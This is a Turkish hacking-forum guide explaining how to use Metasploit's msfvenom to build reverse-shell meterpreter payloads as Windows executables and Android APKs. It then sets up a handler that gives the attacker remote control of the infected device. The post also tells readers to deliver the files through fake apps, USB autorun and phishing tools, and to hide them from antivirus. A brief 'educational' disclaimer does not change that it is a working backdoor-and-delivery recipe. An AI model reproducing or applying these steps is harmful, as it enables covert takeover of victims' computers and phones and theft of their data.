[THT Rehber] Metasploit ile Payload Oluşturma | Android & Windows (2025) 
Selam THT ailesi,
Bugün sizlere siber güvenlik dünyasının efsane framework’ü olan Metasploit üzerinden nasıl payload oluşturulur, nasıl hedef sisteme sızılır adım adım anlatacağım.
Bu konu, özellikle etik hacking öğrenmek isteyenler için altın değerinde
Kullanılan Araçlar:
Kali Linux / Parrot OS / Termux Metasploit Framework msfvenom Android Studio / Windows test ortamı (isteğe bağlı)
1. Payload Oluşturma Komutları
Windows İçin Payload:
bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IPadresin LPORT=port -f exe >; backdoor.exe
Örnek:bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe > hedef.exe
Android İçin Payload:
bash
msfvenom -p android/meterpreter/reverse_tcp LHOST=sizin ip adresiniz LPORT=4444 R > /var/www/html/sizin_dosyanızın_adı.apk Örnek:bash
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 R > /var/www/html/sizin_dosyanızın_adı.apk
2. Listener (Dinleyici) Açmak
Payload’ı oluşturduktan sonra Metasploit’e giriyoruz:
bash
msfconsoleArdından:
bash
use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp set LHOST sizin ip adresinizset LPORT 4444service apache2 startexploit veya run 
Eğer Android payload kullandıysan payload android/meterpreter/reverse_tcp olarak değiştir. 3. Dosyayı Hedefe Gönder
Windows için: USB autorun ile, fake uygulama, sosyal mühendislik. Android için: Sahte uygulama, Seeker, EvilURL ya da başka phishing yöntemleri.
Güvenlik Notu:
Antivirüs tespit edebilir. Payload FUD değilse, şifreleme ve bind shell yöntemleriyle geliştirme yapılabilir. Yasal olmayan kullanım suçtur ve tamamen size aittir. Bu rehber eğitim amaçlıdır.
Bonus Bilgi:
İstersen bu payload’ı USB autorun, ngrok tünel, ya da APK bind gibi farklı tekniklerle birleştirebilirsin.
İleride bunları detaylı anlatacağım.
Hazırlayan: Hamza
Yıl: 2025
TürkHackTeam – White Hat Rehberler
Moderatör tarafında düzenlendi:
